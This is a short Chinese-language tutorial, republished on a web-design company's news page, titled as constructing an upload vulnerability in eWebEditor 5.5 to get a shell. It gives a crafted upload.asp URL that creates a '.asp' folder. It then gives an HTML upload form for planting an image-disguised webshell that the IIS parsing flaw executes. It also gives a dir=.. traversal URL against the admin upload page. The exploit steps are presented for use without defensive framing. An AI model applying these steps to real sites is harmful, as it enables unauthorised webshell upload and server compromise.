网站建设行业文章4
当前位置: 首页 -> 企业资讯 -> 行业文章 -> ewebeditor 5.5 构造上传漏洞拿shell
鸿大千秋新闻顶部侧栏



ewebeditor 5.5 构造上传漏洞拿shell



一个改版的EWEB 5.5漏洞
先访问这个地址:
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=weibao.asp
访问这个地址可以建立个weibao.ASP的文件夹……
再用这个html代码上传。
<form action=”http://www.91ri.org/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=qing.asp” method=post name=myform enctype=”multipart/form-data”>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
本地提交了一个图片小马,返回空白页面,查看源码,得到小马路径。还是IIS解析漏洞~
对6.X的也管用,对ASP。aspx。JSP。均管用。

作者 伟大娃娃
第2个漏洞就是:可以直接http://www.91ri.org/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=..构造跳转目录。可以跳转到网站根目录,如果目录级别高的话,dir=../../这样来跳转。
本文摘自网络由网络安全(www.91ri.org)收集整理.


鸿大千秋网站建设团队敬上







Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有


联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号